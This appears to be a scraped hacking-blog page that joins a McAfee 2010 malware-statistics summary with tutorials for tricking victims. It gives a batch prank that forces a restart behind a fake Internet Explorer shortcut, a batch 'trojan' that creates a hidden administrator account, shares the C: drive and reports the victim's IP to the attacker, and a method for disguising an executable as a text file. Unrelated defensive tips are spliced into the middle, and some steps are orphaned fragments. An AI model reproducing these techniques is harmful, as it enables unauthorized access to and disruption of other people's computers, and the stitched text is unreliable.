Malware increases by 46% in only one year



There is a steady growth of threats to mobile platforms, according to a new McAfee report.

The number of pieces of new mobile malware in 2010 increased by 46 percent compared with 2009. The report also uncovered 20 million new pieces of malware in 2010, equating to nearly 55,000 new malware threats every day.

Of the almost 55 million total pieces of malware McAfee Labs has identified, 36 percent was created in 2010. Concurrently, spam accounted for 80 percent of total email traffic in Q4 2010, the lowest point since the first quarter of 2007.

Threats to mobile platforms are not new. However, as more consumers use mobile devices and tablets in their daily lives and at work, cybercriminals have taken note. During the last several years, McAfee Labs has seen a steady growth in the number of threats to mobile devices.

Some of the most interesting mobile threats of Q4 2010 were SymbOS/Zitmo.A and Android/Geinimi. SymbOS/Zitmo.A was a high-profile threat that struck early in the quarter. The creators of the Zeus botnet repurposed an old version of a commercial spyware package.

Android/Geinimi, a Trojan inserted into legitimate mobile applications and games for the Android platform, was one of the most important threats of the quarter.

With the adoption of so many new mobile platforms, combined with the lack of security awareness and mobile safeguards, McAfee Labs expects cybercriminals to use botnet infections to target mobile devices.

In Q4 2010, Cutwail was dethroned as the global leader in botnet activity, with Rustock the most prevalent in many parts of the world, and Bobax closely trailing behind the two.

The onslaught of malware seems to have no end, and the proliferation of both handled and IP-enabled devices’ affect on this growth remains to be seen. The top malware threats in Q4 2010 were very different in various geographies, due in part to the larger trend that threats now tend to match the types of users, habits and events that are specific to a region.

Favorites for cybercriminals worldwide this quarter consisted of AutoRun malware (Generic!atr), banking Trojans and downloaders (PWS or Generic.dx), as well as web-based exploits (StartPage and Exploit-MS04-028).

Spam hitting its lowest levels in years can be attributed to a “transition period,” with several botnets going dormant during a time of year when spam volumes are usually on an upward path.

In Q4, McAfee Labs learned the Bredolab botnet had been closed along with parts of the Zeus botnet. Around the Christmas holiday, spam from the Rustock, Lethic, and Xarvester botnets all disappeared, while the spam leaders this quarter were the Bobax and Grum botnets.

As more users access the Internet from an ever-expanding pool of devices—computer, tablet, smartphone or Internet TV—web-based threats will continue to grow in size and sophistication. In Q4, some of the most active threats included Zeus-Murofet, Conficker and Koobface, and the number of potentially malicious domains grew at a rapid pace.

Phishing URLs in the form of the IRS, gift cards, rewards accounts, and social networking accounts were also among the most popular. McAfee Labs found that within the top 100 results of the top daily search terms, 51 percent led to malicious sites, and on average each of these poisoned results pages contained more than five malicious links.

McAfee Labs expects attacks using the techniques of search-engine abuse and trend abuse to focus more specifically on new types of devices in 2011.

In 2009, McAfee Labs predicted that vulnerabilities in Adobe product would become the clear choice of malware authors and cybercriminals for distribution malware and compromising systems and networks. This prediction has come true. Throughout 2010 malware developers have heavily exploited weaknesses in both Flash and especially PDF technologies.

McAfee Labs databases reveal that malicious PDFs targeting Adobe Acrobat topped the number of unique samples by a wide margin, making them the favorite target of client-side exploitation. McAfee Labs is certain that the “Adobe” trend will continue this year, as more mobile devices and non-Microsoft operating systems support various Adobe technologies.

How to make a facebook virus

I heard from many of my friends that a virus is spreading on facebook which delete our accounts,I first thought it could have been a trojan that spread out,Then i found out that its just simple prank to shutdown your pc,Now today i will show you how to make a facebookvirus to trick your friends
In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
Making a fake facebook virus! 

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."


3) Save it as something.bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
6) Click Change Icon
7.Choose Internet Explorer icon or similar , click OK , then click Apply

Now your facebook virus is almost ready


8).Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.

How to Get Rid of Trojans:
Here are some practical tips to avoid getting infected (again). For more general security information, please see our main security help page. 
  1. NEVER download blindly from people or sites which you aren't 100% sure about. In other words, as the old saying goes, don't accept candy from strangers. If you do a lot of file downloading, it's often just a matter of time before you fall victim to a trojan.
  2. Even if the file comes from a friend, you still must be sure what the file is before opening it, because many trojans will automatically try to spread themselves to friends in an email address book or on an IRC channel. There is seldom reason for a friend to send you a file that you didn't ask for. When in doubt, ask them first, and scan the attachment with a fully updated anti-virus program.
  3. Beware of hidden file extensions! Windows by default hides the last extension of a file, so that innocuous-looking "susie.jpg" might really be "susie.jpg.exe" - an executable trojan! To reduce the chances of being tricked, unhide those pesky extensions.
  4. NEVER use features in your programs that automatically get or preview files. Those features may seem convenient, but they let anybody send you anything which is extremely reckless. For example, never turn on "auto DCC get" in mIRC, instead ALWAYS screen every single file you get manually. Likewise, disable the preview mode in Outlook and other email programs.
  5. Never blindly type commands that others tell you to type, or go to web addresses mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones). If you do so, you are potentially trusting a stranger with control over your computer, which can lead to trojan infection or other serious harm.
  6. Don't be lulled into a false sense of security just because you run anti-virus programs. Those do not protect perfectly against many viruses and trojans, even when fully up to date. Anti-virus programs should not be your front line of security, but instead they serve as a backup in case something sneaks onto your computer.
  7. Finally, don't download an executable program just to "check it out" - if it's a trojan, the first time you run it, you're already infected!

4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

How to Create a trojan in .bat file

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system. 
In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously  posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer.


Creating a Trojan in a .bat file - Procdure

1.Go to start and click on run and type cmd

2.Now insert this command: net

And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.

Open notepad and write there:


dir
pause


And now save this as test.bat and execute it.

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know which version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access.

How Trojan Works ? 

Trojans typically consist of two parts, a client part and a server part.
When a victim (unknowingly) runs a Trojan server on his machine, 
the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan.
The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well.
When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; 
it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.


      
It is necessary for the attacker to know the victim’s IP address to connect to his/her machine.
Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. 
This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, 
he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, 
the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.


      
Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.

A Trojan horse, or trojan for short, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system. The term comes from the Trojan Horse story in Greek mythology. Trojan horses are not self-replicating which distinguishes them from viruses and worms. Additionally, they require interaction with a hacker to fulfill their purpose. 

Purpose of Trojan horses?

Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system it is possible for ahacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of theTrojan horse.

1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.


2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as 
passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.


3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer.This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.


4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.


5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.


6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.


7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual.in this case they are well known as "Zombies".

How to sent a trojan horse virus as txt file

Hello Friends Today I am Going to Explain you that How to Send Trojans as a Text Files that will execute your desired codes..
AS you all know that .exe is a Executable File and can run a Code .In this Guide I will teach you How to make a .txt executable that can run all of your codes binded or crypted behind it.



Send Trojans as a Text Files - Method

1. First of all You have to download the TEXT ICON PACK .
You can Download It From Below:

2. Extract the Icon Pack to Obtain the Text Icons.

3. Open a new file, Right click - New - Shortcut
Type the location of the item: "X:\WINDOWS\system32\cmd.exe /c file.txt" (where stands for "X"=Drive)


and name it "Readme.txt" (without quotes)

4. After creating the readme.txt file right click on it and choose - Properties
in the - "Start in" fill - "%currentdir%" , in the - "Run" choose - "Minimized".


5. Then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then -
Properties - Change Icon...

6. In order to execute a file you need one..
just change your Server/Virus extension to .TXT and name it - "file.txt"

Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command
- "C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.

7. Now the readme.txt executes a command window, in order to hide it Right click on the "readme.txt" and choose - Properties - Layout and reduced the size on the window to height=1 and width=1.
Now change the window position to height=999 and width=999.

8. Now you are ready to sent a trojan as a txt file..
